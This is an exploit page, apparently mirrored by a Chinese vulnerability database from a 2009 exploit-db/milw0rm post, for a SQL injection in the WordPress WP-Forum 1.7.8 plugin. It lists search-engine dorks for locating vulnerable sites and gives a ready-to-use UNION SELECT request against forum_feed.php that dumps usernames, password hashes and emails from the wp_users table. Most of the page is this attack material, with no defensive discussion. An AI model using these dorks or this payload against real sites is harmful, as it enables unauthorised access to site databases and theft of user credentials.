WordPress Plugin WP-Forum 1.7.8 - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057273 漏洞类型
发布时间 2009-01-12 更新时间 2009-01-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7738
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-----------------------------------------------------------------------------------------------
# Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability #
-----------------------------------------------------------------------------------------------
Author: [[seomafia]]
#########################

Dorks:
allinurl:page_id inurl:showforum
inurl:plugins/wp-forum
"index of /" wp-forum

#######################

Example :
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]


Exploit:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*

#######################

Greetz: Exploit.In

# milw0rm.com [2009-01-12]